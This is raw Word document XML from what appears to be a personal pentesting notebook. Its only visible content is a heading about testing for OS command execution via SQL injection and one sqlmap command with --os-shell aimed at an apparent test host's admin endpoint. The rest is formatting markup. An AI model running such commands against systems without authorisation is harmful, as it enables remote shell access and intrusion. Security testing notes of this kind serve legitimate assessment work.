    <w:p w14:paraId="53F0DC90" w14:textId="52BAC15F" w:rsidR="00606EBF" w:rsidRDefault="00606EBF" w:rsidP="00606EBF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00606EBF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Test for OS Command Execution via SQLi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F08C1B6" w14:textId="77777777" w:rsidR="00606EBF" w:rsidRDefault="00606EBF" w:rsidP="00606EBF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EC72B2D" w14:textId="38EF4024" w:rsidR="00606EBF" w:rsidRPr="00606EBF" w:rsidRDefault="00606EBF" w:rsidP="00606EBF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00606EBF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sqlmap -u "https://testing.pinewheel.ai/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00606EBF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>admin?id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00606EBF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=1" --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00606EBF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>os</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00606EBF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-shell --batch</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00606EBF" w:rsidRPr="00606EBF">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334A2" w14:textId="77777777" w:rsidR="003A4C10" w:rsidRDefault="003A4C10" w:rsidP="00C6554A">
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="7BAAD336" w14:textId="77777777" w:rsidR="003A4C10" w:rsidRDefault="003A4C1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880ED"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A5528" w14:textId="77777777" w:rsidR="003A4C10" w:rsidRDefault="003A4C10" w:rsidP="00C6554A">
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="735A5905" w14:textId="77777777" w:rsidR="003A4C10" w:rsidRDefault="003A4C1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257037"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A156F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1965332"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EBB40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FF7368"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7DA45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9436EC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8D626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4D538C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C9A43E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BB577B2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="52783A1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F0264E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="27F4177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EB6C3D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4ABA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53401"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8042C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A55A47"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E190E1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5547798">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="542013378">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="631134154">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="731544653">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="136380756">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1322739139">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="2050718853">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1169563471">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="2074963058">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1385372179">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="74479148">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1755740320">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="142889107">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1723555329">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="1795178045">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="1905525935">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="144665783">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="913860161">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="2024357829">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="2044018445">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="1432625473">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="696924864">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="647705749">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="304970117">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="5142259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73"/>
    <w:rsid w:val="00040DB4"/>
    <w:rsid w:val="001B2755"/>
    <w:rsid w:val="002554CD"/>
    <w:rsid w:val="00293B83"/>
    <w:rsid w:val="002B4294"/>
    <w:rsid w:val="00333D0D"/>
    <w:rsid w:val="003A4C10"/>
    <w:rsid w:val="00437B6D"/>
    <w:rsid w:val="004814FC"/>
    <w:rsid w:val="004C049F"/>
    <w:rsid w:val="005000E2"/>
    <w:rsid w:val="00606EBF"/>
    <w:rsid w:val="00615BFE"/>
    <w:rsid w:val="006A3CE7"/>
    <w:rsid w:val="0079637E"/>
    <w:rsid w:val="00836DA3"/>
    <w:rsid w:val="00917FD2"/>
    <w:rsid w:val="00AA5673"/>
    <w:rsid w:val="00AB1CE6"/>
    <w:rsid w:val="00BB5CEB"/>
    <w:rsid w:val="00C6554A"/>
    <w:rsid w:val="00E61622"/>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4775F"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{F0739148-3825-404E-BF30-40C9B196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AA5673"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00E61622"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00040D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13295">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="532765627">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1039935695">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="952638010">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="18823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19451">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="73628443">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1688946243">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="7164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699613">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="667753356">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="696321933">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="2029792422">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1523087311">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="417361013">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="21019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4074">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1996032065">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="569198543">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="350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86573031">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="870193148">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1284920230">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1855218176">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="9454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36715">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="794445216">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1474981840">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="9717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392388">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="969558444">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1148008974">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1156457652">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1776444318">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="2011129676">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="336153842">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="9996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3390">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="223108935">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1349597565">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="9717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100">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1595749534">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1941601245">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1950895323">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2030058879">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="21009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ing.pinewheel.a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esting.pinewheel,a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Microsoft\Office\16.0\DTS\en-IN%7bD7DC3519-13A0-4E63-AEF0-C22060985C8A%7d\%7bB83C618D-788D-4D0F-AA08-369D7979C64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{B83C618D-788D-4D0F-AA08-369D7979C64C}tf02835058_win32.dotx</Template>
  <TotalTime>1060</TotalTime>
  <Pages>6</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Maddy's book</dc:creator>
  <cp:keywords/>
